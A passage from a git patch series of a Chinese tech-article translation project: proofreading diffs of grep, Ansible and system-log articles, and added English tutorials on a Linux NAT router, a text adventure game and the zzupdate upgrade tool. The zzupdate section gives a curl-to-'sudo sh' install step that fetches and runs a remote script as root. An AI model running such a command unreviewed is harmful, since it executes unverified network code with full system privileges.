`stretch` 的文件并只输出文件名: +#### 显示包含特定文本的文件名 + +上面的命令都会产生多余的输出。下一个案例则会递归地搜索 `etc` 目录中包含 `stretch` 的文件并只输出文件名: ```shell # grep -Rl stretch /etc/* @@ -96,8 +96,10 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制 ``` #### 大小写不敏感的搜索 -默认情况下搜索 hi 大小写敏感的,也就是说当搜索字符串 `stretch` 时只会包含大小写一致内容的文件。 -通过使用 grep 的 `-i` 选项,grep 命令还会列出所有包含 `Stretch` , `STRETCH` , `StReTcH` 等内容的文件,也就是说进行的是大小写不敏感的搜索。 + +默认情况下搜索是大小写敏感的,也就是说当搜索字符串 `stretch` 时只会包含大小写一致内容的文件。 + +通过使用 `grep` 的 `-i` 选项,`grep` 命令还会列出所有包含 `Stretch` , `STRETCH` , `StReTcH` 等内容的文件,也就是说进行的是大小写不敏感的搜索。 ```shell # grep -Ril stretch /etc/* @@ -108,8 +110,9 @@ grep 的 `-s` 选项会在发现不能存在或者不能读取的文件时抑制 /etc/os-release ``` -#### 搜索是包含/排除指定文件 -`grep` 命令也可以只在指定文件中进行搜索。比如,我们可以只在配置文件(扩展名为`.conf`)中搜索指定的文本/字符串。 下面这个例子就会在 `/etc` 目录中搜索带字符串 `bash` 且所有扩展名为 `.conf` 的文件: +#### 搜索时包含/排除指定文件 + +`grep` 命令也可以只在指定文件中进行搜索。比如,我们可以只在配置文件(扩展名为`.conf`)中搜索指定的文本/字符串。 下面这个例子就会在 `/etc` 目录中搜索带字符串 `bash` 且所有扩展名为 `.conf` 的文件: ```shell # grep -Ril bash /etc/*.conf @@ -118,7 +121,7 @@ OR /etc/adduser.conf ``` -类似的,也可以使用 `--exclude` 来排除特定的文件: +类似的,也可以使用 `--exclude` 来排除特定的文件: ```shell # grep -Ril --exclude=\*.conf bash /etc/* @@ -146,8 +149,10 @@ OR ``` #### 搜索时排除指定目录 -跟文件一样,grep 也能在搜索时排除指定目录。 使用 `--exclude-dir` 选项就行。 -下面这个例子会搜索 `/etc` 目录中搜有包含字符串 `stretch` 的文件,但不包括 `/etc/grub.d` 目录下的文件: + +跟文件一样,`grep` 也能在搜索时排除指定目录。 使用 `--exclude-dir` 选项就行。 + +下面这个例子会搜索 `/etc` 目录中搜有包含字符串 `stretch` 的文件,但不包括 `/etc/grub.d` 目录下的文件: ```shell # grep --exclude-dir=/etc/grub.d -Rwl stretch /etc/* @@ -157,6 +162,7 @@ OR ``` #### 显示包含搜索字符串的行号 + `-n` 选项还会显示指定字符串所在行的行号: ```shell @@ -165,8 +171,10 @@ OR ``` #### 寻找不包含指定字符串的文件 -最后这个例子使用 `-v` 来列出所有 *不* 包含指定字符串的文件。 -例如下面命令会搜索 `/etc` 目录中不包含 `stretch` 的所有文件: + +最后这个例子使用 `-v` 来列出所有**不**包含指定字符串的文件。 + +例如下面命令会搜索 `/etc` 目录中不包含 `stretch` 的所有文件: ```shell # grep -Rlv stretch /etc/* @@ -178,7 +186,7 @@ via: https://linuxconfig.org/how-to-find-all-files-with-a-specific-text-using-li 作者:[Lubos Rendek][a] 译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者 ID](https://github.com/校对者 ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 9ca6788e5fff150d5c6ca4c7c85de512a85fbc40 Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 16 Dec 2017 00:30:38 +0800 Subject: [PATCH 0605/1627] PRF:20171201 Fedora Classroom Session_Ansible 101.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit @imquanquan 对不起,这篇选题失误,已经没有公开发布的价值了。因此校对过后,不会发布到网站了。对不起。 --- ...171201 Fedora Classroom Session_Ansible 101.md | 15 +++------------ 1 file changed, 3 insertions(+), 12 deletions(-) rename {translated/tech => published}/20171201 Fedora Classroom Session_Ansible 101.md (95%) diff --git a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md b/published/20171201 Fedora Classroom Session_Ansible 101.md similarity index 95% rename from translated/tech/20171201 Fedora Classroom Session_Ansible 101.md rename to published/20171201 Fedora Classroom Session_Ansible 101.md index 4a4c5514ba..d50103bf36 100644 --- a/translated/tech/20171201 Fedora Classroom Session_Ansible 101.md +++ b/published/20171201 Fedora Classroom Session_Ansible 101.md @@ -1,6 +1,5 @@ -### [Fedora 课堂会议: Ansible 101][2] - -### By Sachin S Kamath +Fedora 课堂会议:Ansible 101 +========== ![](https://fedoramagazine.org/wp-content/uploads/2017/07/fedora-classroom-945x400.jpg) @@ -13,19 +12,12 @@ Fedora 课堂会议本周继续进行,本周的主题是 Ansible。 会议的 本课堂课程涵盖以下主题: 1. SSH 简介 - 2. 了解不同的术语 - 3. Ansible 简介 - 4. Ansible 安装和设置 - 5. 建立无密码连接 - 6. Ad-hoc 命令 - 7. 管理 inventory - 8. Playbooks 示例 之后还将有 Ansible 102 的后续会议。该会议将涵盖复杂的 playbooks,playbooks 角色(roles),动态 inventory 文件,流程控制和 Ansible Galaxy 命令行工具. @@ -43,7 +35,6 @@ Fedora 课堂会议本周继续进行,本周的主题是 Ansible。 会议的 本次会议将在 [BlueJeans][10] 上进行。下面的信息可以帮你加入到会议: * 网址: [https://bluejeans.com/3466040121][1] - * 会议 ID (桌面版): 3466040121 我们希望您可以参加,学习,并享受这个会议!如果您对会议有任何反馈意见,有什么新的想法或者想要主持一个会议, 可以随时在这篇文章发表评论或者查看[课堂 wiki 页面][11]. @@ -54,7 +45,7 @@ via: https://fedoramagazine.org/fedora-classroom-session-ansible-101/ 作者:[Sachin S Kamath] 译者:[imquanquan](https://github.com/imquanquan) -校对:[校对者ID](https://github.com/校对者ID) +校对:[wxy](https://github.com/wxy) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 2ca715421c983b80824490f277096a47c138ed1a Mon Sep 17 00:00:00 2001 From: wxy Date: Sat, 16 Dec 2017 01:10:10 +0800 Subject: [PATCH 0606/1627] PRF&PUB:20171117 System Logs Understand Your Linux System.md @lujun9972 --- ...ystem Logs Understand Your Linux System.md | 59 ++++++++++++++++ ...ystem Logs Understand Your Linux System.md | 68 ------------------- 2 files changed, 59 insertions(+), 68 deletions(-) create mode 100644 published/20171117 System Logs Understand Your Linux System.md delete mode 100644 translated/tech/20171117 System Logs Understand Your Linux System.md diff --git a/published/20171117 System Logs Understand Your Linux System.md b/published/20171117 System Logs Understand Your Linux System.md new file mode 100644 index 0000000000..0fd33f43e4 --- /dev/null +++ b/published/20171117 System Logs Understand Your Linux System.md @@ -0,0 +1,59 @@ +用系统日志了解你的 Linux 系统 +============ + +本文摘自为 Linux 小白(或者非资深桌面用户)传授技巧的系列文章。该系列文章旨在为 LinuxMagazine 发布的第 30 期特别版 “[Linux 入门][2]” (基于 [openSUSE Leap][3] )提供补充说明。 + +本文作者是 Romeo S.,她是一名基于 PDX 的企业 Linux 专家,专注于为创新企业提供富有伸缩性的解决方案。 + +Linux 系统日志非常重要。后台运行的程序(通常被称为守护进程或者服务进程)处理了你 Linux 系统中的大部分任务。当这些守护进程工作时,它们将任务的详细信息记录进日志文件中,作为它们做过什么的“历史”信息。这些守护进程的工作内容涵盖从使用原子钟同步时钟到管理网络连接。所有这些都被记录进日志文件,这样当有错误发生时,你可以通过查阅特定的日志文件来看出发生了什么。 + +![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg) + +*Photo by Markus Spiske on Unsplash* + +在你的 Linux 计算机上有很多不同的日志。历史上,它们一般以纯文本的格式存储到 `/var/log` 目录中。现在依然有很多日志这样做,你可以很方便的使用 `less` 来查看它们。 + +在新装的 openSUSE Leap 42.3 以及大多数现代操作系统上,重要的日志由 `systemd` 初始化系统存储。 `systemd`这套系统负责启动守护进程,并在系统启动时让计算机做好被使用的准备。由 `systemd` 记录的日志以二进制格式存储,这使得它们消耗的空间更小,更容易被浏览,也更容易被导出成其他各种格式,不过坏处就是你必须使用特定的工具才能查看。好在这个工具已经预安装在你的系统上了:它的名字叫 `journalctl`,而且默认情况下,它会将每个守护进程的所有日志都记录到一个地方。 + +只需要运行 `journalctl` 命令就能查看你的 `systemd` 日志了。它会用 `less` 分页器显示各种日志。为了让你有个直观的感受, 下面是 `journalctl` 中摘录的一条日志记录: + +``` +Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM. +``` + +这条独立的日志记录以此包含了记录的日期和时间、计算机名、记录日志的进程名、记录日志的进程 PID,以及日志内容本身。 + +若系统中某个程序运行出问题了,则可以查看日志文件并搜索(使用 `/` 加上要搜索的关键字)程序名称。有可能导致该程序出问题的错误会记录到系统日志中。 有时,错误信息会足够详细到让你能够修复该问题。其他时候,你需要在 Web 上搜索解决方案。 Google 就很适合来搜索奇怪的 Linux 问题。不过搜索时请注意你只输入了日志的实际内容,行首的那些信息(日期、主机名、进程 ID) 对搜索来说是无意义的,会干扰搜索结果。 + +解决方法一般在搜索结果的前几个连接中就会有了。当然,你不能只是无脑得运行从互联网上找到的那些命令:请一定先搞清楚你要做的事情是什么,它的效果会是什么。据说,搜索系统日志中的特定条目要比直接描述该故障通用关键字要有用的多。因为程序出错有很多原因,而且同样的故障表现也可能由多种问题引发的。 + +比如,系统无法发声的原因有很多,可能是播放器没有插好,也可能是声音系统出故障了,还可能是缺少合适的驱动程序。如果你只是泛泛的描述故障表现,你会找到很多无关的解决方法,而你也会浪费大量的时间。而专门搜索日志文件中的实际内容,你也许会查询出其它人也有相同日志内容的结果。 + +你可以对比一下图 1 和图 2。 + +![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png) + +图 1 搜索系统的故障表现只会显示泛泛的,不精确的结果。这种搜索通常没什么用。 + +![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png) + +图 2 搜索特定的日志行会显示出精确的,有用的结果。这种搜索通常很有用。 + +也有一些系统不用 `journalctl` 来记录日志。在桌面系统中最常见的这类日志包括用于记录 openSUSE 包管理器的行为的 `/var/log/zypper.log`; 记录系统启动时消息的 `/var/log/boot.log` ,开机时这类消息往往滚动的特别快,根本看不过来;`/var/log/ntp` 用来记录 Network Time Protocol (NTP)守护进程同步时间时发生的错误。 另一个存放硬件故障信息的地方是 “Kernel Ring Buffer”(内核环状缓冲区),你可以输入 `demesg -H` 命令来查看(这条命令也会调用 `less` 分页器来查看)。“Kernel Ring Buffer” 存储在内存中,因此会在重启电脑后丢失。不过它包含了 Linux 内核中的重要事件,比如新增了硬件、加载了模块,以及奇怪的网络错误. + +希望你已经准备好深入了解你的 Linux 系统了! 祝你玩的开心! + +-------------------------------------------------------------------------------- + +via: https://www.suse.com/communities/blog/system-logs-understand-linux-system/ + +作者:[chabowski] +译者:[lujun9972](https://github.com/lujun9972) +校对:[wxy](https://github.com/wxy) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.suse.com/communities/blog/author/chabowski/ +[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux +[3]:https://en.opensuse.org/Portal:42.3 +[4]:http://www.linux-magazine.com/ diff --git a/translated/tech/20171117 System Logs Understand Your Linux System.md b/translated/tech/20171117 System Logs Understand Your Linux System.md deleted file mode 100644 index dceea12a63..0000000000 --- a/translated/tech/20171117 System Logs Understand Your Linux System.md +++ /dev/null @@ -1,68 +0,0 @@ -### 系统日志: 了解你的Linux系统 - -![chabowski](https://www.suse.com/communities/blog/files/2016/03/chabowski_avatar_1457537819-100x100.jpg) - By: [chabowski][1] - -本文摘自教授Linux小白(或者非资深桌面用户)技巧的系列文章. 该系列文章旨在为由LinuxMagazine基于 [openSUSE Leap][3] 发布的第30期特别版 “[Getting Started with Linux][2]” 提供补充说明. - -本文作者是 Romeo S. Romeo, 他是一名 PDX-based enterprise Linux 专家,转为创新企业提供富有伸缩性的解决方案. - -Linux系统日志非常重要. 后台运行的程序(通常被称为守护进程或者服务进程)处理了你Linux系统中的大部分任务. 当这些守护进程工作时,它们将任务的详细信息记录进日志文件中,作为他们做过什么的历史信息. 这些守护进程的工作内容涵盖从使用原子钟同步时钟到管理网络连接. 所有这些都被记录进日志文件,这样当有错误发生时,你可以通过查阅特定的日志文件来看出发生了什么. - -![](https://www.suse.com/communities/blog/files/2017/11/markus-spiske-153537-300x450.jpg) - -Photo by Markus Spiske on Unsplash - -有很多不同的日志. 历史上, 他们一般以纯文本的格式存储到 `/var/log` 目录中. 现在依然有很多日志这样做, 你可以很方便的使用 `less` 来查看它们. -在新装的 `openSUSE Leap 42.3` 以及大多数现代操作系统上,重要的日志由 `systemd` 初始化系统存储. `systemd`这套系统负责启动守护进程并在系统启动时让计算机做好被使用的准备。 -由 `systemd` 记录的日志以二进制格式存储, 这使地它们消耗的空间更小,更容易被浏览,也更容易被导出成其他各种格式,不过坏处就是你必须使用特定的工具才能查看. -好在, 这个工具已经预安装在你的系统上了: 它的名字叫 `journalctl`,而且默认情况下, 它会将每个守护进程的所有日志都记录到一个地方. - -只需要运行 `journalctl` 命令就能查看你的 `systemd` 日志了. 它会用 `less` 分页器显示各种日志. 为了让你有个直观的感受, 下面是`journalctl` 中摘录的一条日志记录: - -``` -Jul 06 11:53:47 aaathats3as pulseaudio[2216]: [pulseaudio] alsa-util.c: Disabling timer-based scheduling because running inside a VM. -``` - -这条独立的日志记录以此包含了记录的日期和时间, 计算机名, 记录日志的进程名, 记录日志的进程PID, 以及日志内容本身. - -若系统中某个程序运行出问题了, 则可以查看日志文件并搜索(使用 “/” 加上要搜索的关键字)程序名称. 有可能导致该程序出问题的错误会记录到系统日志中. -有时,错误信息会足够详细让你能够修复该问题. 其他时候, 你需要在Web上搜索解决方案. Google就很适合来搜索奇怪的Linux问题. -![](https://www.suse.com/communities/blog/files/2017/09/Sunglasses_Emoji-450x450.png) -不过搜索时请注意你只输入了日志的内容, 行首的那些信息(日期, 主机名, 进程ID) 是无意义的,会干扰搜索结果. - -解决方法一般在搜索结果的前几个连接中就会有了. 当然,你不能只是无脑得运行从互联网上找到的那些命令: 请一定先搞清楚你要做的事情是什么,它的效果会是什么. -据说, 从系统日志中查询日志要比直接搜索描述故障的关键字要有用的多. 因为程序出错有很多原因, 而且同样的故障表现也可能由多种问题引发的. - -比如, 系统无法发声的原因有很多, 可能是播放器没有插好, 也可能是声音系统出故障了, 还可能是缺少合适的驱动程序. -如果你只是泛泛的描述故障表现, 你会找到很多无关的解决方法,而你也会浪费大量的时间. 而指定搜索日志文件中的内容, 你只会查询出他人也有相同日志内容的结果. -你可以对比一下图1和图2. - -![](https://www.suse.com/communities/blog/files/2017/11/picture1-450x450.png) - -图 1 搜索系统的故障表现只会显示泛泛的,不精确的结果. 这种搜索通常没什么用. - -![](https://www.suse.com/communities/blog/files/2017/11/picture2-450x450.png) - -图 2 搜索特定的日志行会显示出精确的,有用的结果. 这种搜索通常很有用. - -也有一些系统不用 `journalctl` 来记录日志. 在桌面系统中最常见的这类日志包括用于 `/var/log/zypper.log` 记录openSUSE包管理器的行为; `/var/log/boot.log` 记录系统启动时的消息,这类消息往往滚动的特别块,根本看不过来; `/var/log/ntp` 用来记录 Network Time Protocol 守护进程同步时间时发生的错误. -另一个存放硬件故障信息的地方是 `Kernel Ring Buffer`(内核环状缓冲区), 你可以输入 `demesg -H` 命令来查看(这条命令也会调用 `less` 分页器来查看). -`Kernel Ring Buffer` 存储在内存中, 因此会在重启电脑后丢失. 不过它包含了Linux内核中的重要事件, 比如新增了硬件, 加载了模块, 以及奇怪的网络错误. - -希望你已经准备好深入了解你的Linux系统了! 祝你玩的开心! - --------------------------------------------------------------------------------- - -via: https://www.suse.com/communities/blog/system-logs-understand-linux-system/ - -作者:[chabowski] -译者:[lujun9972](https://github.com/lujun9972) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://www.suse.com/communities/blog/author/chabowski/ -[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux -[3]:https://en.opensuse.org/Portal:42.3 -[4]:http://www.linux-magazine.com/ From 4afd32b8491d64dd68e2bae5d558300e2c8b303c Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 08:08:19 +0800 Subject: [PATCH 0607/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Turning=20a=20C?= =?UTF-8?q?entOS/RHEL=206=20or=207=20machine=20into=20a=20router?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...entOS-RHEL 6 or 7 machine into a router.md | 86 +++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md diff --git a/sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md b/sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md new file mode 100644 index 0000000000..05f718cf72 --- /dev/null +++ b/sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md @@ -0,0 +1,86 @@ +Turning a CentOS/RHEL 6 or 7 machine into a router +====== +In this tutorial we are going to learn to convert RHEL/CentOS 6 & 7 machines into a router by using NATting. Router as we know is layer 3 networking device that is used to connect 2 or more networks i.e. either connecting LAN to WAN or LAN to LAN etc. Router devices are quite expensive & especially for small organizations, that might be a reason for concern. So rather than using a dedicated Hardware, we can use any Linux machine & convert it into a router. +We will be discussing process for both RHEL/CentOS 6 & 7\. But before we do that, let's discuss the things we will be needing for our setup. + +### Prerequisite + +**1-** A machine with either RHEL/CentOS 6 or 7 installed +**2-** Two NICs to assign local IP address & WAN IP address respectively + +We must assign IP address to both network interface cards, one IP should be for local area network (information regarding it will be provided by our Network administrator) & other IP should be to access internet, information for WAN IP will be provided by ISP. For example + + **Ifcfg-en0s3 192.168.1.1** (LAN IP address) +**Ifcfg-en0s5 10.1.1.1 ** (WAN IP address) + + **Note** - Change the interface name according to Linux distro being used. + +Now that we have what we need, we will move onto the setup + +### Step 1 Enabling IP forwarding + +Firstly we will enable IP forwarding on the machine. Process of doing same is same in both RHEL/CentOS 6 & 7\. To enable IP forwarding, run + +``` +$ sysctl -w net.ipv4.ip_forward=1 +``` + +But this will not persist on system reboot. To make it survive a system reboot, open + +``` +$ vi /etc/sysctl.conf +``` + +& enter the following to the file, + +``` +net.ipv4.ip_forward = 1 +``` + +Save file & exit. IP forwarding has now been enabled on the system. + +### Step 2 Configuring IPtables/Firewalld rules + +Next we need to start services of IPtables/firewalld on our systems to configure the NATting rule, + +``` +$ systemctl start firewalld (For Centos/RHEL 7) +$ service iptables start (For Centos/RHEL 6) +``` + +Next step is to configure the NATting rule on the firewall. Run the following command, + +``` +CentOS/RHEL 6 +$ iptables -t nat -A POSTROUTING -o XXXX -j MASQUERADE +$ service iptables restart CentOS/RHEL 7 +$ firewall-cmd -permanent -direct -passthrough ipv4 -t nat -I POSTROUTING -o XXXX -j MASQUERADE -s 192.168.1.0/24 +$ systemctl restart firewalld +``` + +Here, **XXXX** is the name of the network interface with the WAN IP address. This completes configuration of Linux machine as router, next we will test our router after configuring a client machine. + +### Step 3 Configuring the client machine + +To test the router, we need to assign the internal (LAN) IP address as gateway on our client machine, its 192.168.1.1 in our case. So whether using a Windows machine or linux machine as client, make sure that we have 192.168.1.1 as our gateway. Once that's done, open terminal/CMD run a ping test against a website to make sure that internet is accessible on client machine, + + **$ ping google.com +** + +We can also check by browsing websites via our web browser. + + +-------------------------------------------------------------------------------- + +via: http://linuxtechlab.com/turning-centosrhel-6-7-machine-router/ + +作者:[][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:http://linuxtechlab.com +[1]:https://www.facebook.com/linuxtechlab/ +[2]:https://twitter.com/LinuxTechLab +[3]:https://plus.google.com/+linuxtechlab From 8189de43e99fe29e062c4d84d51675a86e8149d1 Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 08:09:23 +0800 Subject: [PATCH 0608/1627] =?UTF-8?q?update=20at=202017=E5=B9=B4=2012?= =?UTF-8?q?=E6=9C=88=2016=E6=97=A5=20=E6=98=9F=E6=9C=9F=E5=85=AD=2008:09:2?= =?UTF-8?q?3=20CST?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...71213 Turning a CentOS-RHEL 6 or 7 machine into a router.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md b/sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md index 05f718cf72..ae2cd9e2b2 100644 --- a/sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md +++ b/sources/tech/20171213 Turning a CentOS-RHEL 6 or 7 machine into a router.md @@ -1,3 +1,4 @@ +Translate by lujun9972 Turning a CentOS/RHEL 6 or 7 machine into a router ====== In this tutorial we are going to learn to convert RHEL/CentOS 6 & 7 machines into a router by using NATting. Router as we know is layer 3 networking device that is used to connect 2 or more networks i.e. either connecting LAN to WAN or LAN to LAN etc. Router devices are quite expensive & especially for small organizations, that might be a reason for concern. So rather than using a dedicated Hardware, we can use any Linux machine & convert it into a router. @@ -75,7 +76,7 @@ We can also check by browsing websites via our web browser. via: http://linuxtechlab.com/turning-centosrhel-6-7-machine-router/ 作者:[][a] -译者:[译者ID](https://github.com/译者ID) +译者:[lujun9972](https://github.com/lujun9972) 校对:[校对者ID](https://github.com/校对者ID) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 From 1a044d406a1d364206e2afc9e7997fa0eecfe3ad Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 08:16:39 +0800 Subject: [PATCH 0609/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20The=20Most=20Fa?= =?UTF-8?q?mous=20Classic=20Text-based=20Adventure=20Game?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...amous Classic Text-based Adventure Game.md | 113 ++++++++++++++++++ 1 file changed, 113 insertions(+) create mode 100644 sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md diff --git a/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md b/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md new file mode 100644 index 0000000000..07403cdba8 --- /dev/null +++ b/sources/tech/20171214 The Most Famous Classic Text-based Adventure Game.md @@ -0,0 +1,113 @@ +The Most Famous Classic Text-based Adventure Game +====== +**Colossal Cave Adventure** , also known as **ADVENT** , **Colossal Cave** , or **Adventure** , is a most popular text-based adventure game in the period of early 80s and late 90s. This game is also known to be historic first "interactive fiction" game. In 1976, a Programmer named **Will Crowther** wrote the early version of this game, and later a fellow programmer **Don Woods** improved the game with many features by adding scoring system, more fantasy characters and locations. This game is originally developed for **PDP-10** , a good-old giant Mainframe computer. Later, it was ported to normal home desktop computers like IBM PC and Commodore 64. The original game was written using Fortran, and later it was introduced in MS-DOS 1.0 in the early 1980s by Microsoft. + +The **Adventure 2.5** final version released in 1995 has never been packaged for modern operating systems. It went nearly extinct. Thankfully, after several years the open source advocate **Eric Steven Raymond** has ported this classic game to modern operating systems with the permission from original authors. He open sourced this classic game and hosted the source code in GitLab with a new name **" open-adventure"**. + +The main objective of this game is to find a cave rumored to be filled with a lot of treasure and gold and get out of it alive. The player earns points as he moves around the imaginary cave. The total number of points is 430. This game is mainly inspired by the extensive knowledge of cave exploration of the original author **Will Crowther**. He had been actively exploring in caves, particularly Mammoth Cave in Kentucky. Since the game 's cave structured loosely around the Mammoth Cave, you may notice many similarities between the locations in the game and those in Mammoth Cave. + +### Installing Colossal Cave Adventure game + +Open-Adventure has been packaged for Arch based systems and is available in [**AUR**][1]. So, we can install it using any AUR helpers in Arch Linux and its variants such as Antergos, and Manjaro Linux. + +Using [**Pacaur**][2]: +``` +pacaur -S open-adventure +``` + +Using [**Packer**][3]: +``` +packer -S open-adventure +``` + +Using [**Yaourt**][4]: +``` +yaourt -S open-adventure +``` + +On other Linux distros, you might need to compile and install it from the source as described below. + +Install the perquisites first: + +On Debian and Ubuntu: +``` +sudo apt-get install python3-yaml libedit-dev +``` + +On Fedora: +``` +sudo dnf install python3-PyYAML libedit-devel +``` + +You can also use pip to install PyYAML: +``` +sudo pip3 install PyYAML +``` + +After installing the prerequisites, compile and install open-adventure from source as shown below: +``` +git clone https://gitlab.com/esr/open-adventure.git +``` +``` +make +``` +``` +make check +``` + +Finally, run 'advent' binary to play: +``` +advent +``` + +There is also an Android version of this game available in [**Google Play store**][5]. + +### How to play? + +To start the game, just type the following from Terminal: +``` +advent +``` + +You will see a welcome screen. Type "y" if you want instructions or type "n" to get into the adventurous trip. + +[![][6]][7] + +The game begins in-front of a small brick building. The player needs to direct the character with simple one or two word commands in simple English. To move your character, just type commands like **in** , **out** , **enter** , **exit** , **building** , **forest** , **east** , **west** , **north** , **south** , **up** , or **down**. You can also use one-word letters to specify the direction. Here are some one letters to direct the character to move: **N** , **S** , **E** , **W** , **NW** , **SE** , etc. + +For example, if you type **" south"** or simply **" s"** the character will go south side of the present location. Please note that the character will understand only the first five characters. So when you have to type some long words, such as **northeast** , just use NE (small or caps). To specify southeast use SE. To pick up an item, type **pick**. To exit from a place, type **exit**. To go inside the building or any place, type **in**. To exit from any place, type **exit** and so on. It also warns you if there are any danger along the way. Also you can interact with two-word commands like **" eat food"**, **" drink water"**, **" get lamp"**, **" light lamp"**, **" kill snake"** etc. You can display the help section at any time by simply typing "help". + +[![][6]][8] + +I spent my entire afternoon to see what is in this game. Oh dear, it was super fun, exciting, thrill and adventurous experience! + +[![][6]][9] + +I went into many levels and explored many locations along the way. I even got gold and was attacked by a snake and a dwarf once. I must admit that this game is really addictive and best time killer. + +If you left the cave safely with treasure, you win and you will get full credit to the treasure. You will also get partial credit just for locating the treasure. To end your adventure early, type **" quit"**. To suspend your adventure, type **" suspend"** (or "pause" or "save"). You can resume the adventure later. To see how well you're doing, type **" score"**. Please remember that you will lose points for getting killed, or for quitting. + +Have fun! Cheers! + + + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/colossal-cave-adventure-famous-classic-text-based-adventure-game/ + +作者:[SK][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://aur.archlinux.org/packages/open-adventure/ +[2]:https://www.ostechnix.com/install-pacaur-arch-linux/ +[3]:https://www.ostechnix.com/install-packer-arch-linux-2/ +[4]:https://www.ostechnix.com/install-yaourt-arch-linux/ +[5]:https://play.google.com/store/apps/details?id=com.ecsoftwareconsulting.adventure430 +[6]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7 +[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png () +[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-3.png () +[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.png () From 672c77fa47c8a38c1140e0eb6a3abfc66e295c5f Mon Sep 17 00:00:00 2001 From: darksun Date: Sat, 16 Dec 2017 08:17:56 +0800 Subject: [PATCH 0610/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Easily=20Upgrad?= =?UTF-8?q?e=20Ubuntu=20to=20a=20Newer=20Version=20with=20This=20Single=20?= =?UTF-8?q?Command?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Newer Version with This Single Command.md | 109 ++++++++++++++++++ 1 file changed, 109 insertions(+) create mode 100644 sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md diff --git a/sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md b/sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md new file mode 100644 index 0000000000..31581c8f78 --- /dev/null +++ b/sources/tech/20171128 Easily Upgrade Ubuntu to a Newer Version with This Single Command.md @@ -0,0 +1,109 @@ +Easily Upgrade Ubuntu to a Newer Version with This Single Command +====== +[zzupdate][1] is an open source command line utility that makes the task of upgrading Ubuntu Desktop and Server to newer versions a tad bit easier by combining several update commands into one single command. + +Upgrading an Ubuntu system to a newer release is not a herculean task. Either with the GUI or with a couple of commands, you can easily upgrade your system to the latest release. + +On the other hand, zzupdate written by Gianluigi 'Zane' Zanettini handles clean, update, autoremove, version upgrade and composer self-update for your Ubuntu system with just a single command. + +It cleans up the local cache, updates available package information, and then perform a distribution upgrade. In the next step, it updates the Composer and removes the unused packages. + +The script must run as root user. + +### Installing zzupdate to upgrade Ubuntu to a newer version + +![Upgrade Ubuntu to a newer version with a single command][2] + +![Upgrade Ubuntu to a newer version with a single command][3] + +To install zzupdate, execute the below command in a Terminal. +``` +curl -s https://raw.githubusercontent.com/TurboLabIt/zzupdate/master/setup.sh | sudo sh +``` + +And then copy the provided sample configuration file to zzupdate.conf and set your preferences. 